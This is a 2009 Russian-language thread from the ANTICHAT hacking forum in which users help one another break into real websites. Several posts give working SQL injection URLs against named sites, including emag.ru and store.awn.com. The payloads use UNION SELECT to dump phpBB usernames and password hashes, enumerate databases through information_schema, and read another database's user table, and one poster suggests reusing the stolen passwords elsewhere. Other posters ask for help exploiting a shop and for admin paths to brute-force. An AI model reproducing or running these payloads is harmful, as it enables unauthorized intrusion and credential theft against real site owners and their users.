HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.06.2009, 12:17
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

подскажите у меня руки кривые или вывода нет??
http://www.emag.ru/pr.php?pr=-10+union+select+1,concat_ws(char(58),username,user _password),3,4,5,6,7,8,9,10+FROM+phpbb_users+limit +5,1000
 
Ответить с цитированием

  #2  
Старый 27.06.2009, 12:57
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055

Репутация: 347
По умолчанию

Цитата:
Сообщение от GOGA075  
подскажите у меня руки кривые или вывода нет??
http://www.emag.ru/pr.php?pr=-10+union+select+1,concat_ws(char(58),username,user _password),3,4,5,6,7,8,9,10+FROM+phpbb_users+limit +5,1000
таблица phpbb_users находится в базе данных SC:
Код:
http://www.emag.ru/pr.php?pr=-10+union+select+1,TABLE_SCHEMA,3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_name=char(0x70687062,0x625f7573,0x657273)
причем доступа туда нет. Но легко можно прочитать записи из таблицы phpbb_users1, что в базе данных acom:
Код:
http://www.emag.ru/pr.php?pr=-10+union+select+1,concat(username,0x3a,user_password),3,4,5,6,7,8,9,10+from+acom.phpbb_users1+limit+1,1
может эти пароли куда-то и подойдут
 
Ответить с цитированием

  #3  
Старый 27.06.2009, 12:55
molotovkeyt
Новичок
Регистрация: 02.11.2008
Сообщений: 25
Провел на форуме:
147543

Репутация: 55
По умолчанию

мега шоп, с ПР5. помогите раскрутить.
при попытках присвоить переменной productid значения -1 или 99999999999 или 1+and+1=1 редиректит на страницу "acess denied"
http://store.awn.com/product.php?productid=15'
 
Ответить с цитированием

  #4  
Старый 27.06.2009, 13:15
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

А как можно перемещатся по БД, ели она не одна??
 
Ответить с цитированием

  #5  
Старый 27.06.2009, 13:20
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

from имя_базы.таблица
 
Ответить с цитированием

  #6  
Старый 27.06.2009, 13:26
XXXXXX
Новичок
Регистрация: 03.06.2009
Сообщений: 24
Провел на форуме:
48501

Репутация: -4
Отправить сообщение для XXXXXX с помощью ICQ
По умолчанию

выложите список возможных путей в админку.
ну если неподхожят такие как admin/index.php или admin.php то какие перебирать?
 
Ответить с цитированием

  #7  
Старый 27.06.2009, 13:42
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

AlexSatter
А как мне узнать имина баз?
 
Ответить с цитированием

  #8  
Старый 27.06.2009, 13:47
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079

Репутация: 90
По умолчанию

Цитата:
Сообщение от GOGA075  
AlexSatter
А как мне узнать имина баз?
Если 5-я ветка, то вот так: ?id=-1+union+select+group_concat(table_name)+from+infor mation_schema.tables+group+by+table_schema+limit+1 ,1
или
?id=-1+union+select+concat(table_name)+from+information _schema.tables+limit+17,1 меняй значение limit, чтобы можно было видеть другие таблицы.
Если 4-я ветка, то узнать имена таблиц можно только перебором.
 
Ответить с цитированием

  #9  
Старый 27.06.2009, 13:48
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию

select table_schema from information_schema.tables where table_name='table_name'
для 5той ветки
 
Ответить с цитированием

  #10  
Старый 27.06.2009, 13:51
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

да мне не таблицы нужны!
а название баз данных!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ